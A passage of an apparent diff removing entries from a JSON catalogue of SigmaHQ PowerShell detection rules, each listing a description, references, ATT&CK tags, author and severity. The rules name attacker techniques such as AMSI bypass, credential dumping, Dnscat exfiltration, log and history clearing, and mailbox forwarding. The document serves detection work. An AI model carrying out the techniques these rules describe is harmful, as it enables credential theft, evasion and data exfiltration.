Policy Table (NRPT) rule for the specified namespace.\nThis will bypass the default DNS server and uses a specified server for answering the query.\n", - "uuid": "4368354e-1797-463c-bc39-a309effbe8d7", - "value": "Powershell Add Name Resolution Policy Table Rule", - "meta": { - "refs": [ - "https://twitter.com/NathanMcNulty/status/1569497348841287681", - "https://docs.microsoft.com/en-us/powershell/module/dnsclient/add-dnsclientnrptrule?view=windowsserver2022-ps", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_add_dnsclient_rule.yml" - ], - "tags": [ - "attack.impact", - "attack.t1565" - ], - "creation_date": "2021/09/14", - "filename": "posh_ps_add_dnsclient_rule.yml", - "author": "Borna Talebi", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "ps_script", - "logsource.product": "windows" - } - }, - { - "description": "Detects execution of ADRecon.ps1 for AD reconnaissance which has been reported to be actively used by FIN7", - "uuid": "bf72941a-cba0-41ea-b18c-9aca3925690d", - "value": "PowerShell ADRecon Execution", - "meta": { - "refs": [ - "https://github.com/sense-of-security/ADRecon/blob/11881a24e9c8b207f31b56846809ce1fb189bcc9/ADRecon.ps1", - "https://bi-zone.medium.com/from-pentest-to-apt-attack-cybercriminal-group-fin7-disguises-its-malware-as-an-ethical-hackers-c23c9a75e319", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_adrecon_execution.yml" - ], - "tags": [ - "attack.discovery", - "attack.execution", - "attack.t1059.001" - ], - "creation_date": "2021/07/16", - "filename": "posh_ps_adrecon_execution.yml", - "author": "Bhabesh Raj", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "ps_script", - "logsource.product": "windows" - } - }, - { - "description": "Detects code fragments found in small and obfuscated AMSI bypass PowerShell scripts", - "uuid": 
"e0d6c087-2d1c-47fd-8799-3904103c5a98", - "value": "AMSI Bypass Pattern Assembly GetType", - "meta": { - "refs": [ - "https://www.mdsec.co.uk/2018/06/exploring-powershell-amsi-and-logging-evasion/", - "https://twitter.com/cyb3rops/status/1588574518057979905?s=20&t=A7hh93ONM7ni1Rj1jO5OaA", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_amsi_bypass_pattern_nov22.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1562.001", - "attack.execution" - ], - "creation_date": "2022/11/09", - "filename": "posh_ps_amsi_bypass_pattern_nov22.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "ps_script", - "logsource.product": "windows" - } - }, - { - "description": "Detects Silence EmpireDNSAgent as described in the Group-IP report", - "uuid": "3ceb2083-a27f-449a-be33-14ec1b7cc973", - "value": "Silence.EDA Detection", - "meta": { - "refs": [ - "https://www.group-ib.com/resources/threat-research/silence_2.0.going_global.pdf", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_apt_silence_eda.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.001", - "attack.command_and_control", - "attack.t1071.004", - "attack.t1572", - "attack.impact", - "attack.t1529", - "attack.g0091", - "attack.s0363" - ], - "creation_date": "2019/11/01", - "filename": "posh_ps_apt_silence_eda.yml", - "author": "Alina Stepchenkova, Group-IB, oscd.community", - "level": "critical", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects AS-REP roasting is an attack that is often-overlooked. 
It is not very common as you have to explicitly set accounts that do not require pre-authentication.", - "uuid": "96c982fe-3d08-4df4-bed2-eb14e02f21c8", - "value": "Get-ADUser Enumeration Using UserAccountControl Flags", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1069.002/T1069.002.md#atomic-test-11---get-aduser-enumeration-using-useraccountcontrol-flags-as-rep-roasting", - "https://shellgeek.com/useraccountcontrol-flags-to-manipulate-properties/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_as_rep_roasting.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1033" - ], - "creation_date": "2022/03/17", - "filename": "posh_ps_as_rep_roasting.yml", - "author": "frack113", - "level": "medium", - "falsepositive": [ - "Legitimate PowerShell scripts" - ], - "logsource.category": "ps_script", - "logsource.product": "windows" - } - }, - { - "description": "Once established within a system or network, an adversary may use automated techniques for collecting internal data.", - "uuid": "c1dda054-d638-4c16-afc8-53e007f3fbc5", - "value": "Automated Collection Command PowerShell", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1119/T1119.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_automated_collection.yml" - ], - "tags": [ - "attack.collection", - "attack.t1119" - ], - "creation_date": "2021/07/28", - "filename": "posh_ps_automated_collection.yml", - "author": "frack113", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "ps_script", - "logsource.product": "windows" - } - }, - { - "description": "Detects the execution of AzureHound in PowerShell, a tool to gather data from Azure for BloodHound", - "uuid": "83083ac6-1816-4e76-97d7-59af9a9ae46e", - "value": "AzureHound 
PowerShell Commands", - "meta": { - "refs": [ - "https://github.com/BloodHoundAD/BloodHound/blob/0927441f67161cc6dc08a53c63ceb8e333f55874/Collectors/AzureHound.ps1", - "https://bloodhound.readthedocs.io/en/latest/data-collection/azurehound.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_azurehound_commands.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1482", - "attack.t1087", - "attack.t1087.001", - "attack.t1087.002", - "attack.t1069.001", - "attack.t1069.002", - "attack.t1069" - ], - "creation_date": "2021/10/23", - "filename": "posh_ps_azurehound_commands.yml", - "author": "Austin Songer (@austinsonger)", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "ps_script", - "logsource.product": "windows" - } - }, - { - "description": "Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation.\nScreen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations\n", - "uuid": "d4a11f63-2390-411c-9adf-d791fd152830", - "value": "Windows Screen Capture with CopyFromScreen", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1113/T1113.md#atomic-test-6---windows-screen-capture-copyfromscreen", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_capture_screenshots.yml" - ], - "tags": [ - "attack.collection", - "attack.t1113" - ], - "creation_date": "2021/12/28", - "filename": "posh_ps_capture_screenshots.yml", - "author": "frack113", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "ps_script", - "logsource.product": "windows" - } - }, - { - "description": "Identifies when a user attempts to clear console history. 
An adversary may clear the command history of a compromised account to conceal the actions undertaken during an intrusion.",
- "uuid": "bde47d4b-9987-405c-94c7-b080410e8ea7",
- "value": "Clearing Windows Console History",
- "meta": {
- "refs": [
- "https://stefanos.cloud/blog/kb/how-to-clear-the-powershell-command-history/",
- "https://www.shellhacks.com/clear-history-powershell/",
- "https://community.sophos.com/sophos-labs/b/blog/posts/powershell-command-history-forensics",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_clearing_windows_console_history.yml"
- ],
- "tags": [
- "attack.defense_evasion",
- "attack.t1070",
- "attack.t1070.003"
- ],
- "creation_date": "2021/11/25",
- "filename": "posh_ps_clearing_windows_console_history.yml",
- "author": "Austin Songer @austinsonger",
- "level": "high",
- "falsepositive": [
- "Unknown"
- ],
- "logsource.category": "ps_script",
- "logsource.product": "windows"
- }
- },
- {
- "description": "Detects keywords that could indicate clearing PowerShell history",
- "uuid": "26b692dc-1722-49b2-b496-a8258aa6371d",
- "value": "Clear PowerShell History - PowerShell",
- "meta": {
- "refs": [
- "https://gist.github.com/hook-s3c/7363a856c3cdbadeb71085147f042c1a",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_clear_powershell_history.yml"
- ],
- "tags": [
- "attack.defense_evasion",
- "attack.t1070.003"
- ],
- "creation_date": "2022/01/25",
- "filename": "posh_ps_clear_powershell_history.yml",
- "author": "Ilyas Ochkov, Jonhnathan Ribeiro, Daniil Yugoslavskiy, oscd.community",
- "level": "medium",
- "falsepositive": [
- "Legitimate PowerShell scripts"
- ],
- "logsource.category": "ps_script",
- "logsource.product": "windows"
- }
- },
- {
- "description": "Detects Execution via SyncInvoke in CL_Invocation.ps1 module",
- "uuid": "4cd29327-685a-460e-9dac-c3ab96e549dc",
- "value": "Execution via CL_Invocation.ps1 - Powershell",
- "meta": {
- "refs": [
- "https://lolbas-project.github.io/lolbas/Scripts/Cl_invocation/",
- "https://twitter.com/bohops/status/948061991012327424",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_cl_invocation_lolscript.yml"
- ],
- "tags": [
- "attack.defense_evasion",
- "attack.t1216"
- ],
- "creation_date": "2020/10/14",
- "filename": "posh_ps_cl_invocation_lolscript.yml",
- "author": "oscd.community, Natalia Shornikova",
- "level": "high",
- "falsepositive": [
- "Unknown"
- ],
- "logsource.category": "ps_script",
- "logsource.product": "windows"
- }
- },
- {
- "description": "Detects Execution via SyncInvoke in CL_Invocation.ps1 module",
- "uuid": "f588e69b-0750-46bb-8f87-0e9320d57536",
- "value": "Execution via CL_Invocation.ps1 (2 Lines)",
- "meta": {
- "refs": [
- "https://lolbas-project.github.io/lolbas/Scripts/Cl_invocation/",
- "https://twitter.com/bohops/status/948061991012327424",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_cl_invocation_lolscript_count.yml"
- ],
- "tags": [
- "attack.defense_evasion",
- "attack.t1216"
- ],
- "creation_date": "2020/10/14",
- "filename": "posh_ps_cl_invocation_lolscript_count.yml",
- "author": "oscd.community, Natalia Shornikova",
- "level": "high",
- "falsepositive": [
- "Unknown"
- ],
- "logsource.category": "ps_script",
- "logsource.product": "windows"
- }
- },
- {
- "description": "Detects Execution via runAfterCancelProcess in CL_Mutexverifiers.ps1 module",
- "uuid": "39776c99-1c7b-4ba0-b5aa-641525eee1a4",
- "value": "Execution via CL_Mutexverifiers.ps1",
- "meta": {
- "refs": [
- "https://lolbas-project.github.io/lolbas/Scripts/CL_mutexverifiers/",
- "https://twitter.com/pabraeken/status/995111125447577600",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_cl_mutexverifiers_lolscript.yml"
- ],
- "tags": [
- "attack.defense_evasion",
- "attack.t1216"
- ],
- "creation_date": "2020/10/14",
- "filename": "posh_ps_cl_mutexverifiers_lolscript.yml",
- "author": "oscd.community, Natalia Shornikova",
- "level": "high",
- "falsepositive": [
- "Unknown"
- ],
- "logsource.category": "ps_script",
- "logsource.product": "windows"
- }
- },
- {
- "description": "Detects Execution via runAfterCancelProcess in CL_Mutexverifiers.ps1 module",
- "uuid": "6609c444-9670-4eab-9636-fe4755a851ce",
- "value": "Execution via CL_Mutexverifiers.ps1 (2 Lines)",
- "meta": {
- "refs": [
- "https://lolbas-project.github.io/lolbas/Scripts/CL_mutexverifiers/",
- "https://twitter.com/pabraeken/status/995111125447577600",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_cl_mutexverifiers_lolscript_count.yml"
- ],
- "tags": [
- "attack.defense_evasion",
- "attack.t1216"
- ],
- "creation_date": "2020/10/14",
- "filename": "posh_ps_cl_mutexverifiers_lolscript_count.yml",
- "author": "oscd.community, Natalia Shornikova",
- "level": "high",
- "falsepositive": [
- "Unknown"
- ],
- "logsource.category": "ps_script",
- "logsource.product": "windows"
- }
- },
- {
- "description": "Adversaries may abuse the Windows Task Scheduler to perform task scheduling for initial or recurring execution of malicious code",
- "uuid": "363eccc0-279a-4ccf-a3ab-24c2e63b11fb",
- "value": "Powershell Create Scheduled Task",
- "meta": {
- "refs": [
- "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1053.005/T1053.005.md#atomic-test-4---powershell-cmdlet-scheduled-task",
- "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1053.005/T1053.005.md#atomic-test-6---wmi-invoke-cimmethod-scheduled-task",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_cmdlet_scheduled_task.yml"
- ],
- "tags": [
- "attack.persistence",
- "attack.t1053.005"
- ],
- "creation_date": "2021/12/28",
- "filename": "posh_ps_cmdlet_scheduled_task.yml",
- "author": "frack113",
- "level": "medium",
- "falsepositive": [
- "Unknown"
- ],
- "logsource.category": "ps_script",
- "logsource.product": "windows"
- }
- },
- {
- "description": "Detects usage of the Get-ADComputer cmdlet to collect computer information and output it to a file",
- "uuid": "db885529-903f-4c5d-9864-28fe199e6370",
- "value": "Computer Discovery And Export Via Get-ADComputer Cmdlet - PowerShell",
- "meta": {
- "refs": [
- "http://blog.talosintelligence.com/2022/09/lazarus-three-rats.html",
- "https://www.microsoft.com/en-us/security/blog/2022/10/18/defenders-beware-a-case-for-post-ransomware-investigations/",
- "https://www.cisa.gov/uscert/sites/default/files/publications/aa22-320a_joint_csa_iranian_government-sponsored_apt_actors_compromise_federal%20network_deploy_crypto%20miner_credential_harvester.pdf",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_computer_discovery_get_adcomputer.yml"
- ],
- "tags": [
- "attack.discovery",
- "attack.t1033"
- ],
- "creation_date": "2022/11/17",
- "filename": "posh_ps_computer_discovery_get_adcomputer.yml",
- "author": "Nasreddine Bencherchali",
- "level": "medium",
- "falsepositive": [
- "Legitimate admin scripts may use the same technique, it's better to exclude specific computers or users who execute these commands or scripts often"
- ],
- "logsource.category": "ps_script",
- "logsource.product": "windows"
- }
- },
- {
- "description": "Uses PowerShell to install/copy a a file into a system directory such as \"System32\" or \"SysWOW64\"",
- "uuid": "63bf8794-9917-45bc-88dd-e1b5abc0ecfd",
- "value": "Powershell Install a DLL in System Directory",
- "meta": {
- "refs": [
- "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1556.002/T1556.002.md#atomic-test-1---install-and-register-password-filter-dll",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_copy_item_system_directory.yml"
- ],
- "tags": [
- "attack.credential_access",
- "attack.t1556.002"
- ],
- "creation_date": "2021/12/27",
- "filename": "posh_ps_copy_item_system_directory.yml",
- "author": "frack113, Nasreddine Bencherchali",
- "level": "high",
- "falsepositive": [
- "Unknown"
- ],
- "logsource.category": "ps_script",
- "logsource.product": "windows"
- }
- },
- {
- "description": "Adversaries may leverage the COR_PROFILER environment variable to hijack the execution flow of programs that load the .NET CLR.\nThe COR_PROFILER is a .NET Framework feature which allows developers to specify an unmanaged (or external of .NET) profiling DLL to be loaded into each .NET process that loads the Common Language Runtime (CLR).\nThese profiliers are designed to monitor, troubleshoot, and debug managed code executed by the .NET CLR.\n(Citation: Microsoft Profiling Mar 2017)\n(Citation: Microsoft COR_PROFILER Feb 2013)\n",
- "uuid": "23590215-4702-4a70-8805-8dc9e58314a2",
- "value": "Registry-Free Process Scope COR_PROFILER",
- "meta": {
- "refs": [
- "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1574.012/T1574.012.md#atomic-test-3---registry-free-process-scope-cor_profiler",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_cor_profiler.yml"
- ],
- "tags": [
- "attack.persistence",
- "attack.t1574.012"
- ],
- "creation_date": "2021/12/30",
- "filename": "posh_ps_cor_profiler.yml",
- "author": "frack113",
- "level": "medium",
- "falsepositive": [
- "Legitimate administrative script"
- ],
- "logsource.category": "ps_script",
- "logsource.product": "windows"
- }
- },
- {
- "description": "Detects creation of a local user via PowerShell",
- "uuid": "243de76f-4725-4f2e-8225-a8a69b15ad61",
- "value": "PowerShell Create Local User",
- "meta": {
- "refs": [
- "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1136.001/T1136.001.md",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_create_local_user.yml"
- ],
- "tags": [
- "attack.execution",
- "attack.t1059.001",
- "attack.persistence",
- "attack.t1136.001"
- ],
- "creation_date": "2020/04/11",
- "filename": "posh_ps_create_local_user.yml",
- "author": "@ROxPinTeddy",
- "level": "medium",
- "falsepositive": [
- "Legitimate user creation"
- ],
- "logsource.category": "ps_script",
- "logsource.product": "windows"
- }
- },
- {
- "description": "Adversaries may attempt to access or create a copy of the Active Directory domain database in order to steal credential information",
- "uuid": "afd12fed-b0ec-45c9-a13d-aa86625dac81",
- "value": "Create Volume Shadow Copy with Powershell",
- "meta": {
- "refs": [
- "https://attack.mitre.org/datasources/DS0005/",
- "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.management/get-wmiobject?view=powershell-5.1&viewFallbackFrom=powershell-7",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_create_volume_shadow_copy.yml"
- ],
- "tags": [
- "attack.credential_access",
- "attack.t1003.003"
- ],
- "creation_date": "2022/01/12",
- "filename": "posh_ps_create_volume_shadow_copy.yml",
- "author": "frack113",
- "level": "high",
- "falsepositive": [
- "Legitimate PowerShell scripts"
- ],
- "logsource.category": "ps_script",
- "logsource.product": "windows"
- }
- },
- {
- "description": "An adversary may compress data (e.g., sensitive documents) that is collected prior to exfiltration in order to make it portable and minimize the amount of data sent over the network.",
- "uuid": "6dc5d284-69ea-42cf-9311-fb1c3932a69a",
- "value": "Data Compressed - PowerShell",
- "meta": {
- "refs": [
- "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1560/T1560.md",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_data_compressed.yml"
- ],
- "tags": [
- "attack.exfiltration",
- "attack.t1560"
- ],
- "creation_date": "2019/10/21",
- "filename": "posh_ps_data_compressed.yml",
- "author": "Timur Zinniatullin, oscd.community",
- "level": "low",
- "falsepositive": [
- "Highly likely if archive operations are done via PowerShell."
- ],
- "logsource.category": "ps_script",
- "logsource.product": "windows"
- }
- },
- {
- "description": "Adversaries may employ various system checks to detect and avoid virtualization and analysis environments.\nThis may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox\n",
- "uuid": "d93129cd-1ee0-479f-bc03-ca6f129882e3",
- "value": "Powershell Detect Virtualization Environment",
- "meta": {
- "refs": [
- "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1497.001/T1497.001.md",
- "https://techgenix.com/malicious-powershell-scripts-evade-detection/",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_detect_vm_env.yml"
- ],
- "tags": [
- "attack.defense_evasion",
- "attack.t1497.001"
- ],
- "creation_date": "2021/08/03",
- "filename": "posh_ps_detect_vm_env.yml",
- "author": "frack113, Duc.Le-GTSC",
- "level": "medium",
- "falsepositive": [
- "Unknown"
- ],
- "logsource.category": "ps_script",
- "logsource.product": "windows"
- }
- },
- {
- "description": "Enumerates Active Directory to determine computers that are joined to the domain",
- "uuid": "1f6399cf-2c80-4924-ace1-6fcff3393480",
- "value": "DirectorySearcher Powershell Exploitation",
- "meta": {
- "refs": [
- "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1018/T1018.md#atomic-test-15---enumerate-domain-computers-within-active-directory-using-directorysearcher",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_directorysearcher.yml"
- ],
- "tags": [
- "attack.discovery",
- "attack.t1018"
- ],
- "creation_date": "2022/02/12",
- "filename": "posh_ps_directorysearcher.yml",
- "author": "frack113",
- "level": "medium",
- "falsepositive": [
- "Unknown"
- ],
- "logsource.category": "ps_script",
- "logsource.product": "windows"
- }
- },
- {
- "description": "Adversaries may create a domain account to maintain access to victim systems.\nDomain accounts are those managed by Active Directory Domain Services where access and permissions are configured across systems and services that are part of that domain..\n",
- "uuid": "b29a93fb-087c-4b5b-a84d-ee3309e69d08",
- "value": "Manipulation of User Computer or Group Security Principals Across AD",
- "meta": {
- "refs": [
- "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1136.002/T1136.002.md#atomic-test-3---create-a-new-domain-account-using-powershell",
- "https://docs.microsoft.com/en-us/dotnet/api/system.directoryservices.accountmanagement?view=dotnet-plat-ext-6.0",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_directoryservices_accountmanagement.yml"
- ],
- "tags": [
- "attack.persistence",
- "attack.t1136.002"
- ],
- "creation_date": "2021/12/28",
- "filename": "posh_ps_directoryservices_accountmanagement.yml",
- "author": "frack113",
- "level": "medium",
- "falsepositive": [
- "Legitimate administrative script"
- ],
- "logsource.category": "ps_script",
- "logsource.product": "windows"
- }
- },
- {
- "description": "Detects scripts or commands that disabled the Powershell command history by removing psreadline module",
- "uuid": "602f5669-6927-4688-84db-0d4b7afb2150",
- "value": "Disable Powershell Command History",
- "meta": {
- "refs": [
- "https://twitter.com/DissectMalware/status/1062879286749773824",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_disable_psreadline_command_history.yml"
- ],
- "tags": [
- "attack.defense_evasion",
- "attack.t1070.003"
- ],
- "creation_date": "2022/08/21",
- "filename": "posh_ps_disable_psreadline_command_history.yml",
- "author": "Ali Alwashali",
- "level": "high",
- "falsepositive": [
- "Legitimate script that disables the command history"
- ],
- "logsource.category": "ps_script",
- "logsource.product": "windows"
- }
- },
- {
- "description": "Detect built in PowerShell cmdlet Disable-WindowsOptionalFeature, Deployment Image Servicing and Management tool.\nSimilar to DISM.exe, this cmdlet is used to enumerate, install, uninstall, configure, and update features and packages in Windows images\n",
- "uuid": "99c4658d-2c5e-4d87-828d-7c066ca537c3",
- "value": "Disable-WindowsOptionalFeature Command PowerShell",
- "meta": {
- "refs": [
- "https://github.com/redcanaryco/atomic-red-team/blob/5b67c9b141fa3918017f8fa44f2f88f0b1ecb9e1/atomics/T1562.001/T1562.001.md",
- "https://docs.microsoft.com/en-us/powershell/module/dism/disable-windowsoptionalfeature?view=windowsserver2022-ps",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_disable_windowsoptionalfeature.yml"
- ],
- "tags": [
- "attack.defense_evasion",
- "attack.t1562.001"
- ],
- "creation_date": "2022/09/10",
- "filename": "posh_ps_disable_windowsoptionalfeature.yml",
- "author": "frack113",
- "level": "high",
- "falsepositive": [
- "Unknown"
- ],
- "logsource.category": "ps_script",
- "logsource.product": "windows"
- }
- },
- {
- "description": "Dnscat exfiltration tool execution",
- "uuid": "a6d67db4-6220-436d-8afc-f3842fe05d43",
- "value": "Dnscat Execution",
- "meta": {
- "refs": [
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_dnscat_execution.yml"
- ],
- "tags": [
- "attack.exfiltration",
- "attack.t1048",
- "attack.execution",
- "attack.t1059.001"
- ],
- "creation_date": "2019/10/24",
- "filename": "posh_ps_dnscat_execution.yml",
- "author": "Daniil Yugoslavskiy, oscd.community",
- "level": "critical",
- "falsepositive": [
- "Legitimate usage of PowerShell Dnscat2 \u2014 DNS Exfiltration tool (unlikely)"
- ],
- "logsource.category": "ps_script",
- "logsource.product": "windows"
- }
- },
- {
- "description": "Adversaries may search for common password storage locations to obtain user credentials.\nPasswords are stored in several places on a system, depending on the operating system or application holding the credentials.\n",
- "uuid": "99c49d9c-34ea-45f7-84a7-4751ae6b2cbc",
- "value": "Dump Credentials from Windows Credential Manager With PowerShell",
- "meta": {
- "refs": [
- "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1555/T1555.md",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_dump_password_windows_credential_manager.yml"
- ],
- "tags": [
- "attack.credential_access",
- "attack.t1555"
- ],
- "creation_date": "2021/12/20",
- "filename": "posh_ps_dump_password_windows_credential_manager.yml",
- "author": "frack113",
- "level": "medium",
- "falsepositive": [
- "Unknown"
- ],
- "logsource.category": "ps_script",
- "logsource.product": "windows"
- }
- },
- {
- "description": "Adversaries may use Valid Accounts to interact with remote systems using Windows Remote Management (WinRM). The adversary may then perform actions as the logged-on user.",
- "uuid": "991a9744-f2f0-44f2-bd33-9092eba17dc3",
- "value": "Enable Windows Remote Management",
- "meta": {
- "refs": [
- "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1021.006/T1021.006.md#atomic-test-1---enable-windows-remote-management",
- "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/enable-psremoting?view=powershell-7.2",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_enable_psremoting.yml"
- ],
- "tags": [
- "attack.lateral_movement",
- "attack.t1021.006"
- ],
- "creation_date": "2022/01/07",
- "filename": "posh_ps_enable_psremoting.yml",
- "author": "frack113",
- "level": "medium",
- "falsepositive": [
- "Legitimate script"
- ],
- "logsource.category": "ps_script",
- "logsource.product": "windows"
- }
- },
- {
- "description": "Detect built in PowerShell cmdlet Enable-WindowsOptionalFeature, Deployment Image Servicing and Management tool.\nSimilar to DISM.exe, this cmdlet is used to enumerate, install, uninstall, configure, and update features and packages in Windows images\n",
- "uuid": "55c925c1-7195-426b-a136-a9396800e29b",
- "value": "Enable-WindowsOptionalFeature Command PowerShell",
- "meta": {
- "refs": [
- "https://docs.microsoft.com/en-us/powershell/module/dism/enable-windowsoptionalfeature?view=windowsserver2022-ps",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_enable_windowsoptionalfeature.yml"
- ],
- "tags": [
- "attack.defense_evasion"
- ],
- "creation_date": "2022/09/10",
- "filename": "posh_ps_enable_windowsoptionalfeature.yml",
- "author": "frack113",
- "level": "medium",
- "falsepositive": [
- "Unknown"
- ],
- "logsource.category": "ps_script",
- "logsource.product": "windows"
- }
- },
- {
- "description": "Adversaries may search for common password storage locations to obtain user credentials.\nPasswords are stored in several places on a system, depending on the operating system or application holding the credentials.\n",
- "uuid": "603c6630-5225-49c1-8047-26c964553e0e",
- "value": "Enumerate Credentials from Windows Credential Manager With PowerShell",
- "meta": {
- "refs": [
- "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1555/T1555.md",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_enumerate_password_windows_credential_manager.yml"
- ],
- "tags": [
- "attack.credential_access",
- "attack.t1555"
- ],
- "creation_date": "2021/12/20",
- "filename": "posh_ps_enumerate_password_windows_credential_manager.yml",
- "author": "frack113",
- "level": "medium",
- "falsepositive": [
- "Unknown"
- ],
- "logsource.category": "ps_script",
- "logsource.product": "windows"
- }
- },
- {
- "description": "Detects usage of powershell cmdlets to disable or remove ETW trace sessions",
- "uuid": "115fdba9-f017-42e6-84cf-d5573bf2ddf8",
- "value": "Disable of ETW Trace - Powershell",
- "meta": {
- "refs": [
- "https://medium.com/palantir/tampering-with-windows-event-tracing-background-offense-and-defense-4be7ac62ac63",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_etw_trace_evasion.yml"
- ],
- "tags": [
- "attack.defense_evasion",
- "attack.t1070",
- "attack.t1562.006",
- "car.2016-04-002"
- ],
- "creation_date": "2022/06/28",
- "filename": "posh_ps_etw_trace_evasion.yml",
- "author": "Nasreddine Bencherchali",
- "level": "high",
- "falsepositive": [
- "Unknown"
- ],
- "logsource.category": "ps_script",
- "logsource.product": "windows"
- }
- },
- {
- "description": "Detects usage of the powerShell Set-Mailbox Cmdlet to set-up an SMTP forwarding rule.",
- "uuid": "15b7abbb-8b40-4d01-9ee2-b51994b1d474",
- "value": "Suspicious PowerShell Mailbox SMTP Forward Rule",
- "meta": {
- "refs": [
- "https://m365internals.com/2022/10/07/hunting-in-on-premises-exchange-server-logs/",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_exchange_mailbox_smpt_forwarding_rule.yml"
- ],
- "tags": [
- "attack.exfiltration"
- ],
- "creation_date": "2022/10/26",
- "filename": "posh_ps_exchange_mailbox_smpt_forwarding_rule.yml",
- "author": "Nasreddine Bencherchali",
- "level": "medium",
- "falsepositive": [
- "Legitimate usage of the cmdlet to forward emails"
- ],
- "logsource.category": "ps_script",
- "logsource.product": "windows"
- }
- },
- {
